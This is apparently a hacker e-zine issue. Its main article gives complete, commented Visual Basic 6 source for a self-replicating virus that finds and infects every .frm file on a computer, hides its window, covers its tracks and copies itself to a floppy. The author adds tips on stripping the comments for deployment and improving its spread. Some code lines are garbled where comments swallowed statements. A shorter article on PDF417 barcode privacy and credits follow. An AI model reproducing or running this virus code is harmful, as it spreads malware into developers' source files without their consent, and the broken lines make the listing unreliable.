,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
aftermath.thegreat@gmail.com
Disclaimer:
In no way do I, K-1ine Magazine, Nettwerked and its affiliates endorse or
condone the creation of Viruses, Malware or related malicious code for the
purpose of computer exploitation. This article was written as full disclo-
sure pointing outthe vulnerabilities that exist with the creation of such
code. Myself, K-1ine Magazine, Nettwerked and its affiliates are in no way
responsible for what you do with the information. Take responsibility for
yourself. So far you're doing a good job. Please do yourself a favor and
keep it that way."
What it is:
It's a .frm virus. It infects visual basic 6.0 .frm files. It's written in
visual basic 6.0.
How it works:
It works by making a list of every single file on the infected computer and
checking each and every single one of those files to see if they are a .frm
file. If it is, we check if it is a temporary file (or in a temporary folder)
We do this by checking if there are the letters "Temp" anywhere in the file
name path. We check if it is in a temporary folder because sometimes tempor-
ary files dont like getting written to. This will cause the virus to crash.
If it is not a temporary file, then we infect it. We infect it by opening up
the original source file, finding where the virus code starts, and copying
every single line from the original virus source to the target file. It will
not spread in this manner if it is an exe file. The source in the running
file must be present in plain text or it will be unable to copy itself. So
the user would have to run their visual basic by going Run > start or even
Run > full compile in the vb6.0 software to start its propigation.
Implementation:
Simply take this code and put it into any .frm file where Form_Terminate()
is a procedure that is not being used. In almost all the VB6.0 Code I have
downloaded, Form_Terminate() is almost never used. I recommend copying all
of the source into the visual basic code window so you can see the comments
easier.
I have found that studying viruses and worms very hard in most cases because
they are almost never commented, are not tabbed neatly and (in most cases)
are never documented! In protest, I have liberally commented this code, as
well as put in message boxes to the user, explaining what exactly the virus
code is doing at any given time. As part of implementation, I recommend that
you take out all comments (EXCEPT FOR THE 'faqchew !!! DONT TAKE OUT THAT!
THAT IS THE MARKER WHERE THE CODE WILL FIND ITSELF!) and any lines with the
MsgBox function and any unnecessary white space. This will make the code
copy itself faster. I also wrote it using tabs. This makes it easier to read
(which most virus code is not).
I wrote the whole code with the "option explicit" on so that means that I
have declared all the variables used and if the file that's going to be
infected has option explict on, then my variables have already been declared.
I then took the option explicit out.
At the beginning, we have a line that reads "on Error GoTo abortmission" This
is so that if by some fluke there is an error while the code is running, the
code will not simply crash, but clean up its tracks before bailing out.
Note that there is no payload. I wrote this code to learn something about
viruses. What have I learned? I learned that virus writing is not easy, at
least not for me. Writing a good virus takes time and energy. What I'm going
to say next may offend some people: A good virus is a piece of art. It's easy
to make some parts, but harder in other parts of the virus. For example, in
most cases payloads are very easy to write and are not even necessary. Pay-
loads are not usually the hard part to write. Chances are you already know
many ways to screw up a computer. The method by which it spreads itself is
requred, however, and it takes creativity in thinking up the method in which
it will spread. The next time I see a virus on my computer I will treat it
with more respect than I did before.
I have learned that virus writing is both easier and harder than writing a
worm. With a worm you have to test it out on another computer. This means a
network of some kind. If you dont have a network that you can muck around in,
then tough for you. A virus, however, all you will need is a single stand
alone computer, but you will still need a way to spread the virus. In general,
most worms are spread through the use of remote exploits. This is not usually
the case with viruses. If you were to say to someone "I just wrote the most
awesome worm. It's going to take down the Internet!" One of the first questi-
ons they will probably ask you is "What exploit(s) did you use to create it?".
Now, if you said, "I just wrote the most awesome virus. It's not a worm and
it has the potential to bring down the Internet!" they will probably ask how
it works without asking about remote exploits. That's the major difference
between a worm and a virus. A worm is like this:
i(0) = computer infected with a worm, c = non infected computers
[i(0)] --> [c]
Now the computer that was previously uninfected is now infected. The next
step would look like this:
[i(0)] -->[i(1)] --> [c]
|
|
---> [c]
Now we have two infected computers. The second infected computer is now
infecting some other computer, while the original infected computer ([i(0)])
is off infecting some other random computer some where on the network it's
on. A virus looks more like this:
(IF) = Infected File (NF) = non infected file
(IF) ---> (NF)
The infected file infects a non-infected file. It's very easy to understand.
It works like a worm, but instead of infecting computers over a network, it
infects files on a computer. Viruses are commonly in programs that look like
non-virus programs. If a virus coder chose to target mp3s then the mp3 virus
could be spread on p2p programs and file sharing programs. An MP3 virus would
be very devastating because of the shear amount of mp3's that get passed
around the Internet daily. A well coded mp3 virus could be just as devastat-
ing, if not more devastating than even the worst worms such as the Nimda or
the MyDoom. Imagine some virus writer infecting even just 2 gigs of mp3's on
their own computer, then sharing it on a p2p network or on a torrent. Then
imagine one person downloading one mp3 from the virus writer. Soon, all of
the victim's mp3s are infected. Then some other guy downloads some songs
from the original victim. It could be a pirates worst nightmare or the record
industries wet dream. Let us just hope Metallica doesn't read this file and
get any ideas. Luckly a virus such as that one does not exist (but could).
The files could potentially be anything, but most commonly they are exe files
or com files. In the example below, I choose to target .frm files because I
understand vb source code.
I have also learned that the concept that I have done in this project is not
original by far, and that this type of virus has been written in other
languages such as batch and C (maybe even visual basic, but I have not seen
one) and probably vbs. I wouldn't be suprised if some one told me that there
is a name for this kind of virus. This virus would not spread very far since
VB6.0 is old software and .NET is in. This virus could be re-written in any
language that allows input/output of a file, has a function that lets it
execute command line operations (such as "dir /b /s" in cmd.exe), loops, if
statements, extremely basic math (if needed at all), allows for very basic
string manipulation and keeps its source files in plain text. This is almost
any programming language. If it can be done in batch, where CAN'T it be done
is the question.
Right at the moment I am working on re-working this same concept into .bas
files (visual basic 6.0 module files) except that the whole virus will be
completely polymorphic. I intend to create it so that not only the variables
are complete random strings, but that the placement of the functions are
different each time as well. That is another problem with this virus. Every-
thing happens in the Form_Terminate sub function. If a visual basic progra-
mmer runs this code in Visual studio, then shuts it down, it will be plain
as day that the program did not shut down correctly (anyone who has coded
with vb6.0 knows what I mean). I hope to fix that in the polymorphic version
of this code. This code could be better, but it could be worse too. This is
just to help anyone who wants to understand how viruses work. The code does
work, but it only poses a threat to the single computer that it is run on.
In all honesty I seriously could not see this code spreading off of any one
machine thru a network or a sneakernet. Look forward to seeing another
(better made) virus source which will be much harder to detect both for the
user and anti-virus software in the next K-1ine if I get it done :) But
anyways this is probably all a no-braner to you. Let us get on to the good
stuff...
A few final tips before (if) you study this code. Instead of having it
infect the Form_terminate() sub function, you could instead have it simply
infect the Form_unload() function. You could also have it just print its
own code to a text file somewhere. If the program has been compiled into
an EXE it could still spread to .frm files, but these are excersizes you
can do yourself. I could have re-worked it so that instead of searching
all of "C:\" for files, it will search mid(app.path,1,3) for files. Lots
of computers have their current windows on drives other than C:\. If my
memory serves me correctly, there is a dos program in windows xp somewhere
that prints a list of all current working drives. You then could search
multiple drives for .frm files and/or you could simply place the virus
executable (or .frm file for someone who is curious enough to execute
unknown source code) onto that drive. The executable could be created by
using visual studio 6.0s command line compilecommand. This leads us into
multi-distro techniques, but we won't go that
today.
Oh yeah; anything you do with this code is at your own risk. I will not
take responsibility for your actions or your broken computer or any files
this code may corrupt.
Anyways, here's the source:
Private Sub Form_Terminate()
'faqchew
'if there is an error anywhere in the code, we abort the mission.
On Error GoTo abortmission
Me.Hide
App.TaskVisible = False
'declairing all the variables.
Dim line1, frmchk, infectcheck, aftertime, beforetime as String
Dim hour1, min1, lineput, infectingline As String
Dim copy1, donewaitflag, terminate1, unload1, exeabort As Boolean
Dim i, j As Integer
'here we check if the program is already an exe. if it is..
If Left$(App.EXEName, 4) = ".exe" Or Left$(App.EXEName, 4) = ".EXE" Then
'setting a flag
exeabort = True
'aborting mission (with one exception you will see at the end..)
GoTo abortmission
End If
'here we put all the file names in the path of the application into a
'temporary file called temp.sys.
Shell ("cmd.exe /c cd " & App.Path & " && dir /b > c:\temp.sys"), vbHide
DoEvents
DoEvents
DoEvents
DoEvents
DoEvents
DoEvents
'now we take temp.sys and open it up. we are going to check every listing
'in it to see if it has the virus code in it
Open "C:\temp.sys" For Input As #1
DoEvents
Do
Line Input #1, line1
DoEvents
frmchk = Right$(line1, 4)
'making sure the file has a .frm at the end of it before we open
'it up If frmchk = ".frm" Then
'if it does, we open that file up..
Open line1 For Input As #2
Do
'we start a loop, and check every line in the file for
'the '"warning" sign.. the "infectcheck" if you will. if
'any of the lines have the comment "'faqchew" then the
'file is already infected and will Line Input #2, infect
'check DoEvents infectcheck = Trim(infectcheck)
'if the virus code is present in the frm source
file, then.. If infectcheck = "'faqchew"
Then copy1 = True '..copy1 becomes true..
End If
'if copy1 is true then..
If copy1 = True Then
'..we open c:\temp1.sys..
Open "C:\temp1.sys" For Output As #3
'and we print the name of the source file
'that's infected Print #3, App.Path & "\"
& line1 DoEvents
Close #3
End If
'and we continue this loop until we found the source virus
'or until we exhausted the files in the directory.
Loop Until copy1 = True Or EOF(2)
'if copy1 = false (the virus source could not be found) then
'what's running is probably an exe file, and the rest of the
'source needs not to be run so we exit the program
If copy1 = False Then End
Close #2
End If
'if we found the virus source, we don't need to check the rest of the
'files, so we end if we found it. Loop Until copy1 = True Or EOF(1)
Close #1
'now we do a list of _EVERY SINGLE FILE_ on the WHOLE COMPUTER and put it
'into a file so this could take a while..
Shell ("cmd.exe /c cd c:\ && dir /b /s > c:\temp.sys"), vbHide
'this is were we do the timing. we have to create a delay for the shell
'statement to complete. that's what this part of the code does
beforetime = Time$
min1 = Mid(Time$, 4, 2) 'get the minute
hour1 = Mid(Time$, 1, 2) 'get the hour
'if the minute is more than 50 (eg: the time is 23:52:03) then the minute
'gets set to 00 and the hour gets bumped up one (unless its midnight, then
'the hour will get put to 2 am)
If min1 >= 40 Then
min1 = "00"
If hour1 <> 24 Then hour1 = hour1 + 1
If hour1 = 24 Then hour1 = "02"
End If
'if the minute is less than 40, then we set the timer for fifteen minutes..
'that should give the shell statement enough time to finish up
'(my 480mhz does it in under a minute)
If min1 <> "00" Then min1 = min1 + 1
aftertime = hour1 & ":" & min1 & ":00"
MsgBox "entering delay loop"
'this is the delay loop. this causes the delay, whatever it is set at.
Do
DoEvents
'if it's time to go, then..
MsgBox "aftertime: " & aftertime & " Time: " & Time$
If aftertime = Time$ Then
donewaitflag = True
MsgBox "done delay"
End If
DoEvents
Loop Until donewaitflag = True
'opening up the list of paths to every file on the whole box..
Open "C:\temp.sys" For Input As #1
Do
'get a path from the file
Line Input #1, lineput
'if it's a frm source file, then..
If Right$(lineput, 4) = ".frm" Then
'now we open the file, to see if we are able to put some
'code into the target file. This code isn't necessary, but
'if the target frm file already has a form_terminate
'or a form_unload in it, then putting another one in will
'cause the program to fail to run. This is worse than not
'putting the code in.
MsgBox "We found a .frm file called: " & lineput & " and.."
MsgBox "We are going to infect it unless it is in a temporary folder"
Open lineput For Input As #2
DoEvents
Do
'reusing variables..
Line Input #2, infectcheck
DoEvents
If infectcheck = "Private Sub Form_Terminate()" Then terminate1 = True
If infectcheck = "Private Sub Form_Unload(Cancel As Integer)" Then unload1 = True
DoEvents
Loop Until EOF(2)
DoEvents
Close #2
DoEvents
'if it had both form terminate and form unload being used, this
'part of the code wont get executed.
If terminate1 = True And unload1 = True Then
MsgBox "There is no place to put the code. Trying another file.."
End If
If terminate1 = False Or unload1 = False Then
MsgBox "there IS a place to put the code.."
If InStr(1, lineput, "Temp", vbTextCompare) <= 0 Then
MsgBox "the target file is not a temporary one. Infection proceeding.."
Open lineput For Append As #2
'and we also open up the file where we saved the path to the
'source file that had the virus code in it..
Open "c:\temp1.sys" For Input As #3
DoEvents
'getting the path to the frm with the virus source..
Input #3, infectingline
MsgBox "we are finding the virus source. the path is: " & infectingline
DoEvents
Close #3
DoEvents
'now opening up the infected file to get the virus source..
Open infectingline For Input As #3
Do
Line Input #3, infectingline
Loop Until infectingline = "'faqchew"
'if the form does not have a form_unload OR a form_terminate
'we put a form_unload in, calling form_terminate
'This serves a double purpose. First, its a fail safe for
'form_terminate. Form_terminate is for sure going to be
'executed.
'Second: this will prevent double infection. If a file
'has been infected, it wont get infected again. The virus
'will see that there is no where to put the code, so
'it will just skip over this file.
If terminate1 = False And unload1 = False Then
Print #2, "Private Sub Form_Unload(Cancel As Integer)"
Print #2, "call Form_Terminate"
Print #2, "End If"
End If
MsgBox "we found the line where the virus code starts."
'here we print which event we will use to place
'our virus code
If terminate1 = False Then
Print #2, "Private Sub Form_Terminate()"
MsgBox "we print private sub form_terminate"
Else
Print #2, "Private Sub Form_Unload(Cancel As Integer)"
MsgBox "we print form_unload(cancel as integer)"
End If
'start of loop..
Do
DoEvents
Print #2, infectingline
MsgBox "printing line to target file: " & infectingline
DoEvents
Line Input #3, infectingline
DoEvents
Loop Until infectingline = "'teh endg" Or EOF(3)
msgBox "virus infection complete. now closing files"
Close #3
Close #2
End If
End If
End If
terminate1 = False
unload1 = False
'we loop until we have infected every single frm file..
Loop Until EOF(1)
'close that file up
Close #1
'here's the abort mission.
abortmission:
On Error Resume Next
MsgBox "ABORTING MISSION!"
Close
doevents
'cleaning up our tracks
Shell ("cmd.exe /c del c:\temp.sys"), vbHide
Shell ("cmd.exe /c del c:\temp1.sys"), vbHide
DoEvents
'if it's an exe already, we try one more desperate (and lame) attempt to spread: we try
'putting the exe in a:\
If exeabort = True Then
Shell ("cmd.exe /c copy " & App.Path & "\" & App.EXEName & " a:\boot.exe"), vbHide
end if
doevents
End
End Sub
'teh endg
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
<Gozer> Are you a god?
<Ray> ... no.
<Gozer> THEN DIE!!!!!!!!!!!
<Winston> Ray, when someone asks you if you're a god you say yes!
<Venkmen> Alright... this chick is TOAST!
PDF417 and your privacy
Written by GLHeX
To give an overview - Portable Data File 417 (PDF417) technology is a
2D error-correcting bar code developed in 1991 by Ynjiun Wang of
Symbol Technologies. PDF417's can independently store data as apposed
to conventional bar codes which need to be referenced to a database of
information.
The PDF417 structure has a width of up to 34 columns and a maximum
width of 90 rows in height. A total of 928 combined data and error
correction codes may reside in a single symbol. So there is a limit to
what a single symbol can hold. Though that doesn't mean the data
cannot be stored across several symbols. Macro PDF's can be created to
span data across nearly 900,000 symbols.
In terms of 2D bar codes, it has 4 bars/spaces and is 17 modules wide
- hence the 417. Data capacity varies by data type. 1108 Bytes, 1850
ASCII characters or 2710 numeric digits per symbol.
There are 8 levels of error correction. Eight being the highest or
most data secure relating to error correction. The error correction
level (or security level) directly impacts the size of the symbol. The
higher the error correction relates to how severe the symbol can be
damaged without losing the data stored.
These bar codes are great for quickly retrieving data because they do
not need to be "carefully scanned". They can be scanned just as fast
up side down, diagonally, vertically and so on - with no risk of
errors as a result.
A PDF417's ability to store data does not stop at plain text. They can
also be used to store pictures, fingerprints, signatures, voice data,
binary and more. Pending you have the correct equipment/software to
decode it's structure.
There are plenty of 2D bar codes in use today. Some of the more common
types would be Aztec Code, Codeblock F, Code 1, CP Code, Data Matrix,
MaxiCode and SuperCode. Although you may not recall ever hearing them
by name, you are sure to have encountered them at some point.
Symbol boasts a rather impressive customer base including, but not
limited to; Air France, Associated Grocers, Blockbuster Entertainment,
Boeing, Costco Wholesale, CVS Pharmacy, Eckerd Drugs, Federal Express,
Ford Motor Company, General Motors, Marks & Spencer, MGM, Mobil Oil,
Target Stores, Toys R Us and the US Postal Service.
While most of these customers will use the PDF417 bar code for
shipping and manifest purposes, they can also store information about
you.
Most notably to the relevance of this article would be the US Postal
Service and FedEx. What is not listed above would be state motor
vehicle departments. If you happen to live in one of the lucky states
with 2D bar codes printed on your drivers license - you see them every
time you use your ID.
Some state inspection stickers as well as military and government
stickers displayed on your vehicles windshield clearly show a 2D
PDF417 with your personal information encoded into the stacked blocks
of data.
It's not to say that these companies and organizations are putting
your privacy directly at risk. Some knowledge of the PDF417 format and
a reader are needed to pull your information from the bar code. But is
security through obscurity enough? Definitely not.
In a quote from the Symbol Technologies web site it says:
"The Secure, Low Cost, High Capacity, ID Technology"
This is rather misleading because the information stored in a PDF417
is not encrypted by the PDF417 encoding process. Rather the PDF417's
ability to error check and recover scratched or smudged bar codes is
what's secure. As well as the fact that they are rather hard to
duplicate. Simply said, the information is secure from corruption not
curiosity.
It's easy to understand when you show your ID at a bar or any other
establishment which might scan this bar code already has the coded
information directly in front of them. This information would be on
the front of the ID itself; name, sex, birth date, address, etc.
But with the use of the PDF417 this information can easily be stored
for later use/review.
However that's the risk you take when allowing someone to scan your
ID. You are giving your information to them, you are clearly
identifying yourself. However, your car parked in your work parking
lot should not be subject to the same forfeit of information through
the inspection sticker on your windshield.
A fairly decent digital camera is enough to capture your personal
PDF417 so it can be decoded for anyone to see. This would be name,
address, etc.
It isn't safe to assume that a very expensive piece of specialized
hardware be used to decode this information and that only reputable,
morally driven companies have access to PDF417 scanners. There are
plenty of free software packages available to decode the PDF417
format.
As a matter of fact, even if this were the case there are 2D scanners
available for under $100 and can be purchased by anyone willing to
spend the money.
It would be a shame to say that millions of people everyday are having
their personal information stolen through PDF417's. In fact, it would
probably be very untrue. However it is important to know that just as
leaving a key under a rock, it is no more secure to flaunt your
personal data around through an obscure looking bar code.
Ways to protect the information stored on these bar codes would be to
shred or severely smudge old inspection stickers before discarding
them. Perhaps also covering half of the bar code when affixing your
new inspection sticker. (Though obviously you should yield to your
state laws if doing this.) Be aware of who you hand your ID to and
what they plan on doing with it, there is a clear difference between
confirming identity and stealing it.
As these bar codes become used more and more you'll start to see them
on monthly bills and invoices, bank statements, even social security
cards and documents. Since we can't shred such important valid
identification, it is important to know that the PDF417 on any
personal form, sticker or ID is just as sensitive as the information
displayed in clear text.
You would not believe the overwhelming generosity I received when
simply asking people to take photos and even photocopies of their ID
and registration PDF417 symbols for me. What's unbelievable is that I
was not denied in any instance of asking for these images.
So hopefully this sheds some light into data storage in bar codes and
clearly communicates the reason why they are used and why they should
be treated as sensitive data unless proven otherwise.
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
<CyburNetiks> billy, you listen, i don't know you, i don't know your woman,
and i never killed anyone
Credits:
Without the following contributions, this 'zine issue would be fairly
delayed or not released. So thank you to the following groovy people:
Aestetix, Aftermath, Anonymous Social Engineer, Cybur netiks, CYB0RG/ASM,
Cygnus, Crys, Doobie Ex, GLHeX, H1D30U5, The Clone, and lastly; Wizbone
Shouts:
CYB0RG/ASM, Fractal, h410G3n, The Question, Phlux, Magma, Hack Canada,
The Grasshopper Unit, port9, Nyxojaele, Ms.O, Tr00per, Flopik, jimmiejaz,
*Senorita Chandelier*, Kankraka, io, Cyn1c4l, cyburnetiks, hypatia,
coercion, tek, the irc #hackcanada channel, The Nettwerked Meeting Crew,
and the entire (active) Canadian H/P scene.
R.I.P:
Hunter S. Thompson - (1937 - 2005)
Eazy E - 10 year anniversary of his death on March 26th 2005.
.;t;.,
,.,f, ';t;,;
i" ,"
:t :jDLfffffjti;;,.
; LLffffffffffffjti.
.;i / \ fLffffffffffffffffji.
;tGt; () () tGffffffffffffffffffft:.
.,tLLi; 'jLfffffffffffffffffffft:.
:tfLf" "t'';iitjfffffffffffffftb
.tffLf' --` '; '::.:;tfffffffffffft.
:ifffGi _ j,;;;;;i,;i,jfffffffffffi.
.tffffLi / \ , ,fLffffffffffffft.
:jffffffG; \_/ ;. .:iffffffffffffffffffji;,;:
.tfffffffLL, . .;tffffffffffffffffffLLt;' ;
;ffffffLGj' -' .,ifffffffffffffffLLLLfj' ,d'
:jfffffLf" .,iffffffffffffffft;:. .. ,f;
.,, ,fffffLt' ,ijfffffffffffffff;:. tjjii;,,
z `:, ,fffLf; .,iffffffffffffffftti, j
:, ".,,;jLGf;" .;tfffffffffffffffi,. ;, .:. 't,;:"'
,;"' `'":;' .:ijffffffffffffffji: ;, .,,fjijLGLt. "i.
t,,,., .ii,;..;tffffffffffffffji,. `t;:' :fLfffffLfj,j'
.7 .;ji :tLffffffffffffffji, .jfffffffff;
.j,,;;'i;:;. iijfGLi,ifffffffffffffffi,. tLffffffffj'
;t, ,Lffffffffffffffffffft;. ;Lfffffffff;
;LftLffffffffffffffffffj,. .iLfffffffff;
iffffffffffffffffft;'jtiiji,,:. ,jLffffffffft'
'fffffffffffffi" ,;. ,jLffffffffffi'
:ffffffffffffji;i, .;jffffffffffffi'
:tfffffffffffffft;,. ,;ijLfffffffffffj;
`:ifffffffffffffffLLjjiiiiijjfLffffffffffffffft:'
`:tfffffffffffffffffffffffffffffffffffffffi:'
`:;jfffffffffffffffffffffffffffffffffji;'
`:ijtffffffffffffffffffffffffffjt;'
`':;;ijffffffffffffffffti;;:'
`'if:cyb0rg/asm:fi'`
A N E T T W E R K E D P R O D U C T
MMV/II/XXVIII